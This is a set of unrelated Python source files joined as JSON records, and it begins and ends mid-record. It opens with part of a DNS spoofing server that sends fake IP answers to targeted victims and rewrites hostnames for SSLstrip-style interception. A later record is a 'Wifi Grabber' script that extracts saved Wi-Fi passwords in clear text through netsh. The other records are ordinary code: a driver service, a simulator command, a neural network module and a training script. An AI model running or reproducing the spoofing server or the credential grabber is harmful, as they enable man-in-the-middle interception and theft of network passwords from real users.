(TXT) ID: ' + host)\n # # Here the HANDLE!\n # #os.popen(\"python /yowsup/yowsup-cli -c /yowsup/config -s \\\"Host %s\\nIP %s\\\" > /dev/null &\"%(id,prov_ip));\n # save_req(LOGALERTFILE, 'Alert domain! (TXT) ID: ' + host+ '\\n')\n # if host in dominios: spfresponse = \"v=spf1 a:mail%s/24 mx -all \"%host\n # if dominio in dominios: spfresponse = \"v=spf1 a:mail%s/24 mx -all \"%dominio\n # DEBUGLOG('Responding with SPF = ' + spfresponse)\n # rrset = dns.rrset.from_text(iparpa, ttl, dns.rdataclass.IN, dns.rdatatype.TXT, spfresponse)\n # resp.answer.append(rrset)\n # return resp\n\n\n hosts = respuestas(iparpa[:-1], 'SPF')\n if isinstance(hosts, numbers.Integral):\n print 'No host....'\n resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN\n return resp\n\n for host in hosts:\n print 'Adding ' + host.to_text()\n rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.SPF, host.to_text())\n resp.answer.append(rrset)\n\n return resp\n\ndef std_AAAA_qry(msg):\n resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN\n return resp\n\ndef std_A_qry(msg, prov_ip):\n global consultas\n global ip1\n global ip2\n global fake_ips\n\n dosleep = False\n qs = msg.question\n DEBUGLOG(str(len(qs)) + ' questions.')\n resp = make_response(qry=msg)\n for q in qs:\n qname = q.name.to_text()[:-1]\n DEBUGLOG('q name = ' + qname)\n\n host = qname.lower()\n\n # dom1 = None\n # dominio = None\n\n # punto1 = host.rfind(\".\")\n # punto2 = host.rfind(\".\",0,punto1-1)\n\n # if punto1 > -1:\n # dom1 = host[punto1:]\n\n # if punto2 > -1:\n # dominio = host[punto2:]\n\n\n find_host = None\n for d in dominios:\n if d in host:\n find_host = d\n\n if (find_host is not None):\n ttl = 1\n # id = host[:punto2]\n # if dom1 in dominios:\n # id = host[:punto1]\n # dominio = dom1\n\n DEBUGLOG('Alert domain! ID: ' + host)\n # Here the HANDLE!\n #os.popen(\"python /yowsup/yowsup-cli -c /yowsup/config -s \\\"Host %s\\nIP %s\\\" > /dev/null &\"%(id,prov_ip));\n handler_msg(host)\n save_req(LOGALERTFILE, 'Alert domain! ID: ' + host + '\\n')\n \n if host not in spoof:\n DEBUGLOG('Responding with IP = ' + dominios[find_host])\n rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, dominios[find_host])\n else:\n DEBUGLOG('Responding with IP = ' + spoof[host])\n rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, spoof[host])\n\n resp.answer.append(rrset)\n return resp, dosleep\n\n if \".%s\"%host in dominios:\n dominio = \".%s\"%host\n ttl = 1\n DEBUGLOG('Responding with IP = ' + dominios[dominio])\n rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, dominios[dominio])\n resp.answer.append(rrset)\n return resp, dosleep\n\n ips = respuestas(qname.lower(), 'A')\n if qname.lower() not in spoof and isinstance(ips, numbers.Integral):\n # SSLSTRIP2 transformation\n punto = host.find(\".\")\n dominio = host[punto:]\n host2 = ''\n if host[:5] == 'wwww.' or host[:7] == 'social.':\n host2 = 'www%s' % dominio\n elif host[:3] == 'web':\n host2 = host[3:]\n elif host[:7] == 'cuentas':\n host2 = 'accounts%s' % dominio\n elif host[:5] == 'gmail':\n host2 = 'mail%s' % dominio\n elif host == 'chatenabled.gmail.google.com': # Yes, It is ugly....\n host2 = 'chatenabled.mail.google.com'\n if host2 != '':\n DEBUGLOG('SSLStrip transforming host: %s => %s ...' 
% (host, host2))\n ips = respuestas(host2, 'A')\n\n #print '>>> Victim: %s Answer 0: %s'%(prov_ip,prov_resp)\n\n if isinstance(ips, numbers.Integral):\n DEBUGLOG('No host....')\n resp = make_response(qry=msg, RCODE=3) # RCODE = 3\tNXDOMAIN\n return resp, dosleep\n\n prov_resp = ips[0]\n consultas[prov_ip] = prov_resp\n\n ttl = 1\n if (host not in nospoof) and (prov_ip not in nospoofto) and (len(victims) == 0 or prov_ip in victims):\n if host in spoof:\n save_req(LOGREQFILE, '!!! Specific host (' + host + ') asked....\\n')\n for spoof_ip in spoof[host].split(\",\"):\n DEBUGLOG('Adding fake IP = ' + spoof_ip)\n rrset = dns.rrset.from_text(q.name, 1000, dns.rdataclass.IN, dns.rdatatype.A, spoof_ip)\n resp.answer.append(rrset)\n return resp, dosleep\n elif Forward:\n consultas[prov_ip] = prov_resp\n #print 'DEBUG: Adding consultas[%s]=%s'%(prov_ip,prov_resp)\n if ip1 is not None:\n rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, ip1)\n DEBUGLOG('Adding fake IP = ' + ip1)\n resp.answer.append(rrset)\n if ip2 is not None:\n #Sleep only when using global resquest matrix\n dosleep = True\n rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, ip2)\n DEBUGLOG('Adding fake IP = ' + ip2)\n resp.answer.append(rrset)\n if len(fake_ips)>0:\n for fip in fake_ips:\n rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, fip)\n DEBUGLOG('Adding fake IP = ' + fip)\n resp.answer.append(rrset)\n\n if not Forward and prov_ip not in nospoofto:\n if len(fake_ips) == 0:\n DEBUGLOG('No forwarding....')\n resp = make_response(qry=msg, RCODE=3) # RCODE = 3\tNXDOMAIN\n elif len(fake_ips) > 0:\n DEBUGLOG('No forwarding (but adding fake IPs)...')\n for fip in fake_ips:\n rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, fip)\n DEBUGLOG('Adding fake IP = ' + fip)\n resp.answer.append(rrset)\n return resp, dosleep\n\n for realip in ips:\n DEBUGLOG('Adding real IP = ' + realip.to_text())\n rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, realip.to_text())\n resp.answer.append(rrset)\n\n return resp, dosleep\n\n\n# def std_A2_qry(msg):\n# \tqs = msg.question\n# \tDEBUGLOG(str(len(qs)) + ' questions.')\n# \tiparpa = qs[0].to_text().split(' ',1)[0]\n# \tprint 'Host: '+ iparpa\n# \tresp = make_response(qry=msg)\n# \trrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.A, '4.4.45.4')\n# \tresp.answer.append(rrset)\n# \treturn resp\n\ndef std_ASPOOF_qry(msg):\n global spoof\n qs = msg.question\n DEBUGLOG(str(len(qs)) + ' questions.')\n iparpa = qs[0].to_text().split(' ', 1)[0]\n DEBUGLOG('Host: ' + iparpa)\n resp = make_response(qry=msg)\n\n for q in qs:\n qname = q.name.to_text()[:-1]\n DEBUGLOG('q name = ' + qname) + ' to resolve ' + spoof[qname]\n # \t rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.facebook.com.')\n # \t\tresp.answer.append(rrset)\n # \t\trrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.yahoo.com.')\n # \t\tresp.answer.append(rrset)\n # \t\trrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.tuenti.com.')\n # \t\tresp.answer.append(rrset)\n # \t\trrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.twitter.com.')\n # \t\tresp.answer.append(rrset)\n rrset = dns.rrset.from_text(q.name, 1000, dns.rdataclass.IN, dns.rdatatype.A, spoof[qname])\n resp.answer.append(rrset)\n return resp\n\n\ndef make_response(qry=None, id=None, 
RCODE=0):\n if qry is None and id is None:\n raise Exception, 'bad use of make_response'\n if qry is None:\n resp = dns.message.Message(id)\n # QR = 1\n resp.flags |= dns.flags.QR\n if RCODE != 1:\n raise Exception, 'bad use of make_response'\n else:\n resp = dns.message.make_response(qry)\n resp.flags |= dns.flags.AA\n resp.flags |= dns.flags.RA\n resp.set_rcode(RCODE)\n return resp\n\n\nprocess_files()\nResolver.reset()\nResolver.read_resolv_conf(RESOLVCONF)\nsignal.signal(signal.SIGUSR1, SIGUSR1_handle)\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ns.bind(('', 53))\nif Forward:\n DEBUGLOG('DNS Forwarding activado....')\nelse:\n DEBUGLOG('DNS Forwarding desactivado....')\n\nDEBUGLOG('binded to UDP port 53.')\nserving_ids = []\nnoserv = True\n\nif ip1 is not None and ip2 is not None and Forward:\n sniff = ThreadSniffer()\n sniff.start()\n\nwhile True:\n if noserv:\n DEBUGLOG('waiting requests.')\n\n try:\n message, address = s.recvfrom(1024)\n noserv = True\n except socket.error as (code, msg):\n if code != errno.EINTR:\n raise\n\n if noserv:\n DEBUGLOG('serving a request.')\n requestHandler(address, message)\n"} {"ext": "py", "sha": "1a303a0002877f40cc5192228c1d3443ee8203e9", "content": "from xml.etree.ElementTree import TreeBuilder\nfrom app.models.entities.driver import Driver\nfrom app.models.entities.vehicle import Vehicle\nfrom app.models.result import Result\nfrom app.extensions import db\nfrom app.models.view.driver_view_model import DriverViewModel\n\nclass DriverService:\n def __init__(self) -> None:\n pass\n\n def insert_driver(self, driver: Driver) -> Result:\n result = driver.is_valid()\n if not result.success:\n return result\n \n driverAlreadyExistsByName = Driver.query.filter_by(name=driver.name).first()\n if driverAlreadyExistsByName:\n return Result(success=False, message=\"Ja existe um motorista cadastrado com o nome informado!\")\n\n driverAlreadyExistsByCPF = Driver.query.filter_by(cpf=driver.cpf).first()\n if driverAlreadyExistsByCPF:\n return Result(success=False, message=\"Ja existe um motorista cadastrado com o cpf informado!\")\n \n db.session.add(driver)\n db.session.commit()\n return Result(success= True, message= \"Motorista registrado com sucesso!\")\n \n def update_driver(self, current_driver: Driver, driver_view: DriverViewModel):\n current_driver.fill_update(driver_view)\n result = current_driver.is_valid()\n\n if not result.success:\n return result\n\n db.session.commit()\n return Result(success=True, message=\"Motorista atualizado com sucesso!\")\n\n def delete_driver(self, driver: Driver):\n vehicle = Vehicle.query.filter_by(driver_id=driver.id).first()\n if vehicle != None:\n return Result(success=False, message='''Existem veiculos cadastradados com este motorista!\n Delete antes os veiculos associados para deletar \n o motorista.''')\n\n db.session.delete(driver)\n db.session.commit()\n \n return Result(success=True, message=\"Motorista deletado com sucesso!\")\n\n\n def get_all(self):\n return Driver.query.all()"} {"ext": "py", "sha": "1a303a3f59492eed209748189cef41bdb68cdfa4", "content": "# This file is part of the Blockchain Data Trading Simulator\n# https://gitlab.com/MatthiasLohr/bdtsim\n#\n# Copyright 2021 Matthias Lohr \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by 
applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport logging\nimport multiprocessing\nimport os\nfrom multiprocessing.pool import ApplyResult\nfrom typing import Any, Dict, Optional, Tuple\nfrom queue import Queue\n\nimport yaml\n\nfrom bdtsim.account import AccountFile\nfrom bdtsim.data_provider import DataProviderManager\nfrom bdtsim.environment import EnvironmentManager\nfrom bdtsim.protocol import ProtocolManager, DEFAULT_ASSET_PRICE\nfrom bdtsim.renderer import RendererManager\nfrom bdtsim.simulation import Simulation\nfrom bdtsim.simulation_result import SimulationResult, SimulationResultSerializer\nfrom bdtsim.util.types import to_bool\nfrom .command_manager import SubCommand\n\n\nDEFAULT_ENVIRONMENT_CONFIGURATION: Dict[str, Any] = {'name': 'PyEVM'}\nDEFAULT_DATA_PROVIDER_CONFIGURATION: Dict[str, Any] = {'name': 'RandomDataProvider'}\n\nlogger = logging.getLogger(__name__)\n\n\nclass BulkExecuteSubCommand(SubCommand):\n help = 'bulk execute simulations and renderings'\n\n def __init__(self, parser: argparse.ArgumentParser) -> None:\n super(BulkExecuteSubCommand, self).__init__(parser)\n parser.add_argument('bulk_configuration')\n parser.add_argument('-p', '--processes', type=int, default=multiprocessing.cpu_count())\n\n def __call__(self, args: argparse.Namespace) -> Optional[int]:\n with open(args.bulk_configuration, 'r') as fp:\n bulk_configuration = yaml.load(fp, Loader=yaml.SafeLoader)\n\n logger.info('creating process pool with %i processes' % args.processes)\n process_pool = multiprocessing.Pool(processes=args.processes)\n processes: Queue[ApplyResult[Any]] = Queue()\n\n simulation_configurations = bulk_configuration.get('simulations')\n if not isinstance(simulation_configurations, list):\n raise ValueError('simulations is not a list')\n\n renderer_configurations = bulk_configuration.get('renderers')\n if not isinstance(simulation_configurations, list):\n raise ValueError('renderers is not a list')\n\n target_directory = bulk_configuration.get('target_directory', 'bulk_output')\n os.makedirs(target_directory, exist_ok=True)\n\n def renderer_success_callback(params: Tuple[Dict[str, Any], Dict[str, Any], bytes]) -> None:\n sim_conf, renderer_conf, result = params\n logger.info('renderer succeeded (%s, %s)' % (str(sim_conf), str(renderer_conf)))\n with open(os.path.join(\n target_directory,\n self.get_output_filename(sim_conf, renderer_conf, suffix=renderer_conf.get('suffix'))\n ), 'wb') as f:\n f.write(result)\n\n def renderer_error_callback(error: BaseException) -> None:\n logger.warning('renderer error: %s' % str(error))\n\n def simulation_success_callback(params: Tuple[Dict[str, Any], SimulationResult]) -> None:\n local_simulation_configuration, result = params\n logger.info('simulation succeeded (%s)' % str(local_simulation_configuration))\n logger.debug('writing down result')\n with open(os.path.join(\n target_directory,\n self.get_output_filename(local_simulation_configuration, suffix='result')\n ), 'wb') as f:\n simulation_result_serializer = SimulationResultSerializer(\n compression=to_bool(bulk_configuration.get('output_compression', True)),\n b64encoding=to_bool(bulk_configuration.get('output_b64encoding', True))\n )\n f.write(simulation_result_serializer.serialize(result))\n\n 
logger.debug('scheduling renderers')\n for renderer_configuration in renderer_configurations:\n processes.put(process_pool.apply_async(\n func=self.run_renderer,\n kwds={\n 'simulation_configuration': local_simulation_configuration,\n 'renderer_configuration': renderer_configuration,\n 'simulation_result': result\n },\n callback=renderer_success_callback,\n error_callback=renderer_error_callback\n ))\n\n def simulation_error_callback(error: BaseException) -> None:\n logger.warning('simulation error callback called: %s' % str(error))\n\n logger.debug('scheduling simulations')\n for simulation_configuration in simulation_configurations:\n processes.put(process_pool.apply_async(\n func=self.run_simulation,\n kwds={\n 'simulation_configuration': simulation_configuration\n },\n callback=simulation_success_callback,\n error_callback=simulation_error_callback\n ))\n\n while not processes.empty():\n process = processes.get(block=True)\n process.wait()\n\n return 0\n\n @staticmethod\n def run_simulation(simulation_configuration: Dict[str, Any]) -> Tuple[Dict[str, Any], SimulationResult]:\n protocol_configuration = simulation_configuration.get('protocol')\n environment_configuration = simulation_configuration.get('environment')\n data_provider_configuration = simulation_configuration.get('data_provider')\n\n if protocol_configuration is None:\n raise ValueError('missing protocol configuration')\n if environment_configuration is None:\n environment_configuration = DEFAULT_ENVIRONMENT_CONFIGURATION\n if data_provider_configuration is None:\n data_provider_configuration = DEFAULT_DATA_PROVIDER_CONFIGURATION\n\n protocol = ProtocolManager.instantiate(\n name=protocol_configuration.get('name', ''),\n **protocol_configuration.get('parameters', {})\n )\n\n account_file = AccountFile(simulation_configuration.get('account_file'))\n\n environment = EnvironmentManager.instantiate(\n name=environment_configuration.get('name', ''),\n operator=account_file.operator,\n seller=account_file.seller,\n buyer=account_file.buyer,\n **environment_configuration.get('parameters', {})\n )\n\n data_provider = DataProviderManager.instantiate(\n name=data_provider_configuration.get('name', ''),\n **data_provider_configuration.get('parameters', {})\n )\n\n simulation = Simulation(\n protocol=protocol,\n environment=environment,\n data_provider=data_provider,\n operator=account_file.operator,\n seller=account_file.seller,\n buyer=account_file.buyer,\n protocol_path_coercion=simulation_configuration.get('protocol_path'),\n price=simulation_configuration.get('price', DEFAULT_ASSET_PRICE),\n )\n\n simulation_result = simulation.run()\n return simulation_configuration, simulation_result\n\n @staticmethod\n def run_renderer(simulation_configuration: Dict[str, Any], renderer_configuration: Dict[str, Any],\n simulation_result: SimulationResult) -> Tuple[Dict[str, Any], Dict[str, Any], bytes]:\n renderer = RendererManager.instantiate(\n name=renderer_configuration.get('name', ''),\n **renderer_configuration.get('parameters', {})\n )\n result = renderer.render(simulation_result)\n return simulation_configuration, renderer_configuration, result\n\n @staticmethod\n def get_output_filename(simulation_configuration: Dict[str, Any],\n renderer_configuration: Optional[Dict[str, Any]] = None,\n suffix: Optional[str] = None) -> str:\n def component2str(component_config: Dict[str, Any]) -> str:\n result = str(component_config.get('name'))\n parameter_lines = []\n for key, value in component_config.get('parameters', {}).items():\n 
parameter_lines.append('%s=%s' % (key, value))\n if len(parameter_lines):\n result += '-%s' % '-'.join(parameter_lines)\n return result\n\n output = '_'.join([\n component2str(simulation_configuration.get('protocol', {})),\n component2str(simulation_configuration.get('environment', {})),\n component2str(simulation_configuration.get('data_provider', DEFAULT_DATA_PROVIDER_CONFIGURATION))\n ])\n\n if renderer_configuration is not None:\n output += '_%s' % component2str(renderer_configuration)\n\n if suffix is not None:\n output += '.%s' % suffix\n\n return output\n"} {"ext": "py", "sha": "1a303a7e7556b807d8dabca004224fcf8f7c42f0", "content": "import pyross.tsi.deterministic\n\n"} {"ext": "py", "sha": "1a303bbba43054c984f5a7800187e46e2cf1cea5", "content": "\"\"\"\nRaspberry Pi tests.\n\"\"\"\n"} {"ext": "py", "sha": "1a303c7c062fd43b40ab19c623d931b57fd096f7", "content": "import torch\nimport torch.nn as nn\n\n\nclass ACM(nn.Module):\n # def __init__(self, in_channels, num_heads=32, orthogonal_loss=True):\n def __init__(self, in_channels, num_heads=8, orthogonal_loss=True):\n super(ACM, self).__init__()\n\n assert in_channels % num_heads == 0\n\n self.in_channels = in_channels\n self.num_heads = num_heads\n\n self.add_mod = AttendModule(self.in_channels, num_heads=num_heads)\n self.sub_mod = AttendModule(self.in_channels, num_heads=num_heads)\n self.mul_mod = ModulateModule(channel=self.in_channels, num_groups=num_heads, compressions=2)\n\n self.orthogonal_loss = orthogonal_loss\n\n self.init_parameters()\n\n def init_parameters(self):\n if self.add_mod is not None:\n self.add_mod.init_parameters()\n if self.sub_mod is not None:\n self.sub_mod.init_parameters()\n if self.mul_mod is not None:\n self.mul_mod.init_parameters()\n\n def forward(self, x):\n\n mu = x.mean([2, 3], keepdim=True)\n x_mu = x - mu\n\n # creates multipying feature\n mul_feature = self.mul_mod(mu) # P\n\n # creates add or sub feature\n add_feature = self.add_mod(x_mu) # K\n\n # creates add or sub feature\n sub_feature = self.sub_mod(x_mu) # Q\n\n y = (x + add_feature - sub_feature) * mul_feature\n\n if self.orthogonal_loss:\n dp = torch.mean(add_feature * sub_feature, dim=1, keepdim=True)\n return y, dp\n else:\n return y\n\n\nclass AttendModule(nn.Module):\n\n def __init__(self, in_channels, num_heads=4):\n super(AttendModule, self).__init__()\n\n self.num_heads = int(num_heads)\n self.in_channels = in_channels\n self.num_c_per_head = self.in_channels // self.num_heads\n assert self.in_channels % self.num_heads == 0\n\n self.map_gen = nn.Sequential(\n nn.Conv2d(in_channels, num_heads, kernel_size=1, stride=1, padding=0, bias=True, groups=num_heads)\n )\n\n self.normalize = nn.Softmax(dim=2)\n self.return_weight = False\n\n def init_parameters(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n nn.init.constant_(m.bias, 0.0)\n\n def batch_weighted_avg(self, xhats, weights):\n\n b, c, h, w = xhats.shape\n # xhat reshape\n xhats_reshape = xhats.view(b * self.num_heads, self.num_c_per_head, h, w)\n xhats_reshape = xhats_reshape.view(b * self.num_heads, self.num_c_per_head, h * w)\n\n # weight reshape\n weights_reshape = weights.view(b * self.num_heads, 1, h, w)\n weights_reshape = weights_reshape.view(b * self.num_heads, 1, h * w)\n\n weights_normalized = self.normalize(weights_reshape)\n weights_normalized = weights_normalized.transpose(1, 2)\n\n mus = torch.bmm(xhats_reshape, weights_normalized)\n mus = mus.view(b, self.num_heads * 
self.num_c_per_head, 1, 1)\n\n return mus, weights_normalized\n\n def forward(self, x):\n\n b, c, h, w = x.shape\n\n weights = self.map_gen(x)\n\n mus, weights_normalized = self.batch_weighted_avg(x, weights)\n\n if self.return_weight:\n weights_normalized = weights_normalized.view(b, self.num_heads, h * w, 1)\n weights_normalized = weights_normalized.squeeze(-1)\n\n weights_normalized = weights_normalized.view(b, self.num_heads, h, w)\n weights_splitted = torch.split(weights_normalized, 1, 1)\n return mus, weights_splitted\n\n return mus\n\n\nclass ModulateModule(nn.Module):\n\n def __init__(self, channel, num_groups=32, compressions=2):\n super(ModulateModule, self).__init__()\n self.feature_gen = nn.Sequential(\n nn.Conv2d(channel, channel//compressions, kernel_size=1, stride=1, padding=0, bias=True, groups=num_groups),\n nn.ReLU(inplace=True),\n nn.Conv2d(channel//compressions, channel, kernel_size=1, stride=1, padding=0, bias=True, groups=num_groups),\n nn.Sigmoid()\n )\n\n def init_parameters(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n nn.init.constant_(m.bias, 0.0)\n\n def forward(self, x):\n y = self.feature_gen(x)\n return y\n\n\nif __name__ == '__main__':\n\n x1 = torch.randn(256 * 20 * 20 * 5).view(5, 256, 20, 20).float()\n acm = ACM(num_heads=32, in_channels=256, orthogonal_loss=True)\n acm.init_parameters()\n y, dp = acm(x1)\n print(y.shape)\n print(dp.shape)\n\n # ACM without orthogonal loss\n acm = ACM(num_heads=32, in_channels=256, orthogonal_loss=False)\n acm.init_parameters()\n y = acm(x1)\n print(y.shape)\n"} {"ext": "py", "sha": "1a303d137c88cb611703c2d83001fd5964a1e2d4", "content": "import subprocess\nimport time\nimport os\n\nlocaltime = time.asctime( time.localtime(time.time()))\ndata = subprocess.check_output(['netsh','wlan','show','profiles']).decode('utf-8').split('\\n')\nprofiles = [i.split(\":\")[1][1:-1] for i in data if \"All User Profile\" in i]\nfile = open(\"result.txt\", \"a\")\nprint(\"\\n[+] Wifi Grabber: \" + localtime + \"\\n\")\nfile.write(\"\\n[+] Wifi Grabber: \" + localtime + \"\\n\")\nprint(\"========================================================\",file=file)\nprint(localtime, file=file)\nprint(\"========================================================\",file=file)\nfile.close\nfor i in profiles:\n results = subprocess.check_output(['netsh','wlan','show','profile',i,\n 'key=clear']).decode(\"utf-8\").split('\\n')\n results = [b.split(\":\")[1][1:-1] for b in results if \"Key Content\" in b]\n try:\n print(\"{:<30} | {:<}\".format(i, results[0]),file=file)\n file.close\n except IndexError:\n print(\"{:<30} | {:<}\".format(i, \"\"))\n\ntime.sleep(3)\nexit(code=True)\n"} {"ext": "py", "sha": "1a303e265fe5afb1b4c1ab347327b59041b58f21", "content": "###########################################################################\n# Created by: Hang Zhang\n# Email: zhang.hang@rutgers.edu\n# Copyright (c) 2017\n###########################################################################\n\nimport os, sys\nBASE_DIR = os.path.dirname(os.path.dirname(os.getcwd()))\nsys.path.append(BASE_DIR)\nimport yaml\nimport argparse\nimport numpy as np\nfrom addict import Dict\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils import data\nfrom tensorboardX import SummaryWriter\nimport torchvision.transforms as transform\nfrom torch.nn.parallel.scatter_gather import gather\n\nimport encoding.utils as utils\nfrom encoding.nn import SegmentationLosses, SyncBatchNorm\nfrom 
encoding.parallel import DataParallelModel, DataParallelCriterion\nfrom encoding.datasets import get_dataset\nfrom encoding.models import get_segmentation_model\nCONFIG_PATH = './results/config.yaml'\nSMY_PATH = os.path.dirname(CONFIG_PATH)\nGPUS = [0, 1]\n\n# model settings\nparser = argparse.ArgumentParser(description='model specification')\nparser.add_argument('--with_att', action='store_true', default= False, help='whether use attention to fuse rgb and dep')\nparser.add_argument('--att_type', type=str, default='AG2', help='Attention type to fuse rgb and dep')\nsettings= parser.parse_args()\nprint('settings attention:{} attention type:{}'.format(settings.with_att, settings.att_type))\n\n\nclass Trainer():\n def __init__(self, args):\n self.args = args\n # data transforms\n input_transform = transform.Compose([\n transform.ToTensor(), # convert RGB [0,255] to FloatTensor in range [0, 1]\n transform.Normalize([.485, .456, .406], [.229, .224, .225])]) # mean and std based on imageNet\n dep_transform = transform.Compose([\n transform.ToTensor(),\n transform.Normalize(mean=[0.2798], std=[0.1387]) # mean and std for depth\n ])\n # dataset\n data_kwargs = {'transform': input_transform, 'dep_transform': dep_transform,\n 'base_size': args.base_size, 'crop_size': args.crop_size}\n trainset = get_dataset(args.dataset, split=args.train_split, mode='train', **data_kwargs)\n testset = get_dataset(args.dataset, split='val', mode='val', **data_kwargs)\n # dataloader\n kwargs = {'num_workers': args.workers, 'pin_memory': True} if args.cuda else {}\n self.trainloader = data.DataLoader(trainset, batch_size=args.batch_size, drop_last=True, shuffle=True, **kwargs)\n self.valloader = data.DataLoader(testset, batch_size=args.batch_size, drop_last=False, shuffle=False, **kwargs)\n self.nclass = trainset.num_class\n\n # model and params\n model = get_segmentation_model(args.model, dataset=args.dataset, backbone=args.backbone, pretrained=True,\n root='../../encoding/models/pretrain', n_features=256,\n with_att=settings.with_att, att_type=settings.att_type,\n )\n\n print(model)\n # optimizer using different LR\n base_ids = list(map(id, model.base.parameters()))\n base_dep_ids = list(map(id, model.dep_base.parameters()))\n base_params = filter(lambda p: id(p) in base_ids + base_dep_ids, model.parameters())\n other_params = filter(lambda p: id(p) not in base_ids + base_dep_ids, model.parameters())\n self.optimizer = torch.optim.SGD([{'params': base_params, 'lr': args.lr},\n {'params': other_params, 'lr': args.lr * 10}],\n lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)\n\n # criterions\n self.criterion = SegmentationLosses(se_loss=args.se_loss,\n aux=args.aux,\n nclass=self.nclass,\n se_weight=args.se_weight,\n aux_weight=args.aux_weight)\n # lr scheduler\n self.scheduler = utils.LR_Scheduler_Head(args.lr_scheduler, args.lr, args.epochs,\n iters_per_epoch=len(self.trainloader), warmup_epochs=10)\n self.best_pred = 0.0\n\n # using cuda\n self.device = torch.device(\"cuda:0\" if args.cuda else \"cpu\")\n if args.cuda:\n if torch.cuda.device_count() > 1:\n print(\"Let's use\", torch.cuda.device_count(), \"GPUs!\") # [30,xxx]->[10,...],[10,...],[10,...] 
on 3 GPUs\n model = nn.DataParallel(model, device_ids=GPUS)\n self.model = model.to(self.device)\n\n # for writing summary\n path = \"/\".join((\"{}-{}\".format(*i) for i in settings.__dict__.items()))\n self.writer = SummaryWriter(os.path.join(SMY_PATH, path))\n # resuming checkpoint\n if args.resume is not None and args.resume != 'None':\n if not os.path.isfile(args.resume):\n raise RuntimeError(\"=> no checkpoint found at '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume)\n args.start_epoch = checkpoint['epoch']\n if args.cuda:\n self.model.module.load_state_dict(checkpoint['state_dict'])\n else:\n self.model.load_state_dict(checkpoint['state_dict'])\n if not args.ft:\n self.optimizer.load_state_dict(checkpoint['optimizer'])\n self.best_pred = checkpoint['best_pred']\n print(\"=> loaded checkpoint '{}' (epoch {})\".format(args.resume, checkpoint['epoch']))\n # clear start epoch if fine-tuning\n if args.ft:\n args.start_epoch = 0\n\n def training(self, epoch):\n train_loss = 0.0\n self.model.train()\n\n total_inter, total_union, total_correct, total_label, total_loss = 0, 0, 0, 0, 0\n for i, (image, dep, target) in enumerate(self.trainloader):\n image, dep, target = image.to(self.device), dep.to(self.device), target.to(self.device)\n self.scheduler(self.optimizer, i, epoch, self.best_pred)\n self.optimizer.zero_grad()\n outputs = self.model(image, dep)\n loss = self.criterion(outputs, target)\n loss.backward()\n self.optimizer.step()\n\n correct, labeled = utils.batch_pix_accuracy(outputs.data, target)\n inter, union = utils.batch_intersection_union(outputs.data, target, self.nclass)\n total_correct += correct\n total_label += labeled\n total_inter += inter\n total_union += union\n train_loss += loss.item()\n\n if (i+1) % 50 == 0:\n print('epoch {}, step {}, loss {}'.format(epoch + 1, i + 1, train_loss / 50))\n self.writer.add_scalar('train_loss', train_loss / 50, epoch * len(self.trainloader) + i)\n train_loss = 0.0\n pixAcc = 1.0 * total_correct / (np.spacing(1) + total_label)\n IOU = 1.0 * total_inter / (np.spacing(1) + total_union)\n mIOU = IOU.mean()\n print('epoch {}, pixel Acc {}, mean IOU {}'.format(epoch + 1, pixAcc, mIOU))\n self.writer.add_scalar(\"mean_iou/train\", mIOU, epoch)\n self.writer.add_scalar(\"pixel accuracy/train\", pixAcc, epoch)\n\n def train_n_evaluate(self):\n\n for epoch in range(self.args.epochs):\n # run on one epoch\n print(\"\\n===============train epoch {}/{} ==========================\\n\".format(epoch, self.args.epochs))\n\n # one full pass over the train set\n self.training(epoch)\n\n # evaluate for one epoch on the validation set\n print('\\n===============start testing, training epoch {}\\n'.format(epoch))\n pixAcc, mIOU, loss = self.validation(epoch)\n print('evaluation pixel acc {}, mean IOU {}, loss {}'.format(pixAcc, mIOU, loss))\n\n # save the best model\n is_best = False\n new_pred = (pixAcc + mIOU) / 2\n if new_pred > self.best_pred:\n is_best = True\n self.best_pred = new_pred\n utils.save_checkpoint({'epoch': epoch + 1,\n 'state_dict': self.model.module.state_dict(),\n 'optimizer': self.optimizer.state_dict(),\n 'best_pred': self.best_pred}, self.args, is_best)\n\n def validation(self, epoch):\n # Fast test during the training\n def eval_batch(model, image, dep, target):\n # model, image, target already moved to gpus\n pred = model(image, dep)\n loss = self.criterion(pred, target)\n correct, labeled = utils.batch_pix_accuracy(pred.data, target)\n inter, union = 